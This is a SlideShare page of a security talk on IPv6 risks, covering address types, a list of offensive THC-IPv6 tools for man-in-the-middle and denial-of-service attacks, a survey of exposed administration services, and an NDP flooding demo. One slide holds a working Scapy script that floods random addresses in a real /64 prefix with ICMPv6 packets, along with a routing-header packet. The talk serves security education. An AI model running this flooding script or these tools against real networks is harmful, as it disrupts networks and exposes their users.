Download to read offline
![Hacking IPv6
IPv6(dst="2a02:9001:0:ffff:80:58:105:253")/
IPv6ExtHdrRouting(type=0,addresses=["2a02:9001:0:57::6"])/
ICMPv6EchoRequest()
#!/usr/bin/pythonfrom
scapy.all import *
def aleatorio():
ff=str(RandIP6())
ff=ff[20:39]
return ff
for i in range(1,100000):
packet=IPv6(src="2001:5c0:1400:a:8000:0:580c:3aa",dst="2a02:9008:3:111:"
+(aleatorio()))/ICMPv6EchoRequest()
send(packet,iface="sit1")
8](https://image.slidesharecdn.com/crash-133899603696-phpapp02-120606102219-phpapp02/85/Crash-8-320.jpg)
Uploaded byRafael Sánchez Gómez
Crash
This document discusses IPv6 security risks. It begins with a brief introduction to IPv6 and its address types. It then outlines some hacking tools for IPv6 like parasite6 for man-in-the-middle attacks. Research results show administration services are exposed on the public internet through IPv6 prefixes. A demo shows tunneling and NDP flooding attacks on IPv6 networks. The document concludes by asking if the audience has any questions.
Crash
- 1. A little bitof IPv6 security Rafa Sanchez Gómez – CISA rafa@iniqua.com @r_a_ff_a_e_ll_o 1
- 2. Seguridad en IPv6 1. Brief introduction to IPv6 2. Some security risks in IPv6 3. Research results 4. Demo 2
- 3. 1. Brief introductionto IPv6 3
- 4. Some interesting aspectsof IPv6 The main driver for IPv6 is its increased address space IPv6 uses 128-bit addresses There are different address types (unicast, anycast, and multicast) and different address scopes (link-local, global, etc.) It’s common for a node to be using, at any given time, several addresses, of multiple types and scopes. 4
- 5. Some interesting aspectsof IPv6 The “end-to-end principle” … Each device will have a globally-unique address. NATs will be no longer needed. 5
- 6.
- 7. Hacking IPv6 - parasite6: icmp neighbor solitication/advertisement spoofer, puts you as man-in-the-middle, same as ARP mitm (and parasite) - alive6: an effective alive scanng, which will detect all systems listening to this address - fake_router6: announce yourself as a router on the network, with the highest priority - redir6: redirect traffic to you intelligently (man-in-the-middle) with a clever icmp6 redirect spoofer - toobig6: mtu decreaser with the same intelligence as redir6 - dos-new-ip6: detect new ip6 devices and tell them that their chosen IP collides on the network (DOS). - trace6: very fast traceroute6 with supports ICMP6 echo request and TCP- SYN - flood_router6: flood a target with random router advertisements - flood_advertise6: flood a target with random neighbor advertisements - exploit6: known ipv6 vulnerabilities to test against a target - denial6: a collection of denial-of-service tests againsts a target - fuzz_ip6: fuzzer for ipv6 - implementation6: performs various implementation checks on ipv6 - implementation6d: listen daemon for implementation6 to check behind a fw - fake_mld6: announce yourself in a multicast group on the net - fake_mld26: same but for MLDv2 7
- 8. Hacking IPv6 IPv6(dst="2a02:9001:0:ffff:80:58:105:253")/ IPv6ExtHdrRouting(type=0,addresses=["2a02:9001:0:57::6"])/ ICMPv6EchoRequest() #!/usr/bin/pythonfrom scapy.all import * def aleatorio(): ff=str(RandIP6()) ff=ff[20:39] return ff for i in range(1,100000): packet=IPv6(src="2001:5c0:1400:a:8000:0:580c:3aa",dst="2a02:9008:3:111:" +(aleatorio()))/ICMPv6EchoRequest() send(packet,iface="sit1") 8
- 9. 2. Some securityrisks in IPv6 9
- 10. IPv4 Attack Example Internal Network Victim is attacked !!! 10
- 11. IPv6 Connectivity Schema No NAT Needed with IPv6 No internal network needed Direct connectivity Administration 2a02:9008:3::1 Administration Public Prefix assigned 2a02:9008:3::/64 11
- 12. IPv6 Phishing AttackExample Victim is attacked !!! 2a02:9008:3::1 Public Prefix assigned 2a02:9008:3::/64 Don’t work too hard No scpecial vulnerability in the routers is needed. Default Passwords No interaction from the Brute Force (Hydra) clients is needed Exploit Known Vulnerabilities 12
- 13. Users also exposed End-to-end model 2a02:9008:3::a36:1 Vulnerable 2a02:9008:3::a35:2 services !! 2a02:9008:3::1 2a02:9008:3::a46:8 2a02:9008:3::a86:6 13
- 14.
- 15. Administration Services exposedin Internet We made a research to check if this was a real risk, and we discovered that indeed it is… We collected public information avaliable in Internet about IPv6 prefixes asigned by LIRs 15
- 16.
- 17. Administration Services exposedin Internet We Scanned some of those prefixes just using nmap Only some of the first IPs of each prefix… 17
- 18. Administration Services exposedin Internet 18
- 19. Administration Services exposedin Internet Mail services in IPv6 SPAM nightmare is coming… 19
- 20. 4. Demo … 20
- 21. Tunneling… 1. Windows 7 2. Linux (Backtrack) 3. Mac OS 21
- 22. NDP 2a02:9008:3:f0f0:437:af0:665:8 2a02:9008:3:f0f0:437:af0:665:8 2a02:9008:3:f0f0:889:acb:9999:1 Public Prefix 2a02:9008:3:f0f0:437:af0:665:8 2a02:9008:3:f0f0:/64 2a02:9008:3:f0f0:7676:bbb:9:10 22
- 23. NDP Flooding … 2a02:9008:3:f0f0:437:af0:665:8 Public Prefix 2a02:9008:3:f0f0:RAND 2a02:9008:3:f0f0:437:af0:665:8 2a02:9008:3:f0f0:/64 2a02:9008:3:f0f0:889:acb:9999:1 2a02:9008:3:f0f0:7676:bbb:9:10 CAM Table 11:22:33:44:55:66 - 2a02:9008:3:f0f0:437:af0:665:8 66:55:44:33:22:11 - 2a02:9008:3:f0f0:7676:bbb:9:10 …-… 23
- 24. NDP Flooding inaction… 24
- 25. Questions ??? Rafa Sánchez Gómez rafa@iniqua.com @R_a_ff_a_e_ll_o es.linkedin.com/in/rafasanchezgomez 25